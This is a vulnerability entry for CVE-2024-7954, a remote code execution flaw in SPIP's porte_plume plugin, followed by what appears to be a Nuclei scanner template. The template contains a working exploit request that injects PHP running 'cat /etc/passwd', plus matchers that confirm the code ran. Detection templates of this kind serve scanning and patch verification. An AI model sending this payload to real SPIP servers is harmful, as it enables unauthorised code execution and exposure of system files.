The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
PoC代码[已公开]
id: CVE-2024-7954
info:
name: SPIP Porte Plume Plugin - Remote Code Execution
author: s4e-io
severity: critical
description: |
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
reference:
- https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
- https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
- https://vulncheck.com/advisories/spip-porte-plume
- https://nvd.nist.gov/vuln/detail/CVE-2024-7954
- https://github.com/bigb0x/CVE-2024-7954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-7954
cwe-id: CWE-284
epss-score: 0.93743
epss-percentile: 0.99848
metadata:
max-request: 1
vendor: spip
product: spip
fofa-query: app="SPIP"
tags: cve,cve2024,spip,rce,vkev
http:
- raw:
- |
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- 'Composed-By: SPIP'
- type: status
status:
- 200
# digest: 490a00463044022043a6202530a44462fc46b9af028041a48f45bfc1447fccb22319028e38c97dc602204e80de57cb1c691cc90e8d1a09aff0506d16005db60d7506c3149d583a7716a6:922c64590222798bb761d5b6d8e72950